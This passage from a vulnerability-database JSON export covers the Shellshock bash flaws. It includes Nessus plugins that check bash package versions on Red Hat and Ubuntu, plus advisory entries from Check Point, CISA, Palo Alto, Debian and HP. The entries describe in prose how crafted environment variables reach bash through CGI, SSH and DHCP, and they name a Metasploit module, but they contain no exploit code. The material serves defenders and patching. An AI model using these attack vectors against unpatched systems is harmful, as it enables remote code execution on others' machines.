this issue.\n(CVE-2014-6271)\n\nFor additional information on the CVE-2014-6271 flaw, refer to the Knowledgebase article at https://access.redhat.com/articles/1200223\n\nRed Hat would like to thank Stephane Chazelas for reporting this issue.\n\nAll bash users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 / 7 : bash (RHSA-2014:1293) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:bash", "p-cpe:/a:redhat:enterprise_linux:bash-debuginfo", "p-cpe:/a:redhat:enterprise_linux:bash-doc", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.5", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2014-1293.NASL", "href": "https://www.tenable.com/plugins/nessus/77828", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1293. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77828);\n script_version(\"1.41\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-6271\");\n script_xref(name:\"RHSA\", value:\"2014:1293\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"RHEL 5 / 6 / 7 : bash (RHSA-2014:1293) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Updated bash packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nA flaw was found in the way Bash evaluated certain specially crafted\nenvironment variables. An attacker could use this flaw to override or\nbypass environment restrictions to execute shell commands. Certain\nservices and applications allow remote unauthenticated attackers to\nprovide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nFor additional information on the CVE-2014-6271 flaw, refer to the\nKnowledgebase article at https://access.redhat.com/articles/1200223\n\nRed Hat would like to thank Stephane Chazelas for reporting this\nissue.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/articles/1200223\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2014:1293\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-6271\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash, bash-debuginfo and / or bash-doc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-6271\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:1293\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bash-3.2-33.el5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bash-3.2-33.el5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bash-3.2-33.el5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bash-debuginfo-3.2-33.el5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bash-debuginfo-3.2-33.el5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bash-debuginfo-3.2-33.el5.1\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bash-4.1.2-15.el6_5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bash-4.1.2-15.el6_5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bash-4.1.2-15.el6_5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bash-debuginfo-4.1.2-15.el6_5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bash-debuginfo-4.1.2-15.el6_5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bash-debuginfo-4.1.2-15.el6_5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bash-doc-4.1.2-15.el6_5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bash-doc-4.1.2-15.el6_5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bash-doc-4.1.2-15.el6_5.1\")) flag++;\n\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bash-4.2.45-5.el7_0.2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bash-4.2.45-5.el7_0.2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bash-debuginfo-4.2.45-5.el7_0.2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bash-debuginfo-4.2.45-5.el7_0.2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bash-doc-4.2.45-5.el7_0.2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bash-doc-4.2.45-5.el7_0.2\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo / bash-doc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T14:13:27", "description": "Stephane Chazelas discovered that Bash incorrectly handled trailing code in function definitions. An attacker could use this issue to bypass environment restrictions, such as SSH forced command environments.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "nessus", "title": "Ubuntu 10.04 LTS / 12.04 LTS / 14.04 LTS : bash vulnerability (USN-2362-1) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:bash", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2362-1.NASL", "href": "https://www.tenable.com/plugins/nessus/77854", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2362-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77854);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\");\n script_xref(name:\"USN\", value:\"2362-1\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 12.04 LTS / 14.04 LTS : bash vulnerability (USN-2362-1) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security-related patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"Stephane Chazelas discovered that Bash incorrectly handled trailing\ncode in function definitions. An attacker could use this issue to\nbypass environment restrictions, such as SSH forced command\nenvironments.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://usn.ubuntu.com/2362-1/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2022 Canonical, Inc. / NASL script (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04|12\\.04|14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 12.04 / 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"bash\", pkgver:\"4.1-2ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"bash\", pkgver:\"4.2-2ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"bash\", pkgver:\"4.3-7ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "checkpoint_security": [{"lastseen": "2023-04-20T02:09:12", "description": "\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2014-09-24T21:00:00", "type": "checkpoint_security", "title": "Check Point Response to CVE-2014-6271 and CVE-2014-7169 Bash Code Injection vulnerability ", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2014-09-24T21:00:00", "id": "CPS:SK102673", "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk102673", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2023-08-16T03:26:05", "description": "GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute code. This CVE correctly remediates the vulnerability in CVE-2014-6271.", "cvss3": {}, "published": "2022-01-28T00:00:00", "type": "cisa_kev", "title": "GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-28T00:00:00", "id": "CISA-KEV-CVE-2014-7169", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "paloalto": [{"lastseen": "2021-06-08T19:08:39", "description": "Palo Alto Networks has become aware of a remote code execution vulnerability in the Bash shell utility. This vulnerability (CVE-2014-6271) allows for remote code execution through multiple vectors due to the way Bash is often used on linux systems for processing commands. Additional information can be found here: http://seclists.org/oss-sec/2014/q3/650 \n", "cvss3": {}, "published": "2014-09-24T00:00:00", "type": "paloalto", "title": "Bash Shell remote code execution (CVE-2014-6271, CVE-2014-7169)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2014-09-25T00:00:00", "id": "PAN-SA-2014-0004", "href": "https://securityadvisories.paloaltonetworks.com/Home/Detail/24", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debiancve": [{"lastseen": "2023-10-01T11:48:22", "description": "GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka \"ShellShock.\" NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2014-09-24T18:48:00", "type": "debiancve", "title": "CVE-2014-6271", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2014-09-24T18:48:00", "id": "DEBIANCVE:CVE-2014-6271", "href": "https://security-tracker.debian.org/tracker/CVE-2014-6271", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T06:25:08", "description": "GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.", "cvss3": {}, "published": "2014-09-25T01:55:00", "type": "debiancve", "title": "CVE-2014-7169", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2014-09-25T01:55:00", "id": "DEBIANCVE:CVE-2014-7169", "href": "https://security-tracker.debian.org/tracker/CVE-2014-7169", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-01T11:48:22", "description": "GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271 and CVE-2014-7169.", "cvss3": {}, "published": "2014-09-27T22:55:00", "type": "debiancve", "title": "CVE-2014-6277", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-7169"], "modified": "2014-09-27T22:55:00", "id": "DEBIANCVE:CVE-2014-6277", "href": "https://security-tracker.debian.org/tracker/CVE-2014-6277", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-01T11:48:22", "description": "GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary commands via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.", "cvss3": {}, "published": "2014-09-30T10:55:00", "type": "debiancve", "title": "CVE-2014-6278", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169"], "modified": "2014-09-30T10:55:00", "id": "DEBIANCVE:CVE-2014-6278", "href": "https://security-tracker.debian.org/tracker/CVE-2014-6278", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04471546\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04471546\r\nVersion: 1\r\n\r\nHPSBHF03124 rev.1 - HP Thin Clients running Bash, Remote Execution of Code\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-10-03\r\nLast Updated: 2014-10-03\r\n\r\nPotential Security Impact: Injection of code\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with certain HP Thin\r\nClients running bash. The vulnerabilities, known as shellshock could be\r\nexploited remotely to allow execution of code.\r\n\r\nReferences:\r\n\r\nCVE-2014-6271\r\nCVE-2014-7169\r\nSSRT101728\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nNote: all versions of HP Thin Pro and HP Smart Zero Core operating systems\r\nprior to version 5.1.0 are affected by this vulnerability. Following is a\r\ncomplete list of affected operating systems.\r\n\r\nHP ThinPro\r\n\r\nHP ThinPro 5.0 &#40;released June 2014&#41;\r\nHP ThinPro 4.4 &#40;released November 2013&#41;\r\nHP ThinPro 4.3 &#40;released June 2013&#41;\r\nHP ThinPro 4.2 &#40;released November 2012&#41;\r\nHP ThinPro 4.1 &#40;released March 2012&#41;\r\nHP ThinPro 3.2 &#40;released November 2010&#41;\r\nHP ThinPro 3.1 &#40;released June 2010&#41;\r\nHP ThinPro 3.0 &#40;released November 2009&#41;\r\nHP ThinPro 2.0 &#40;released 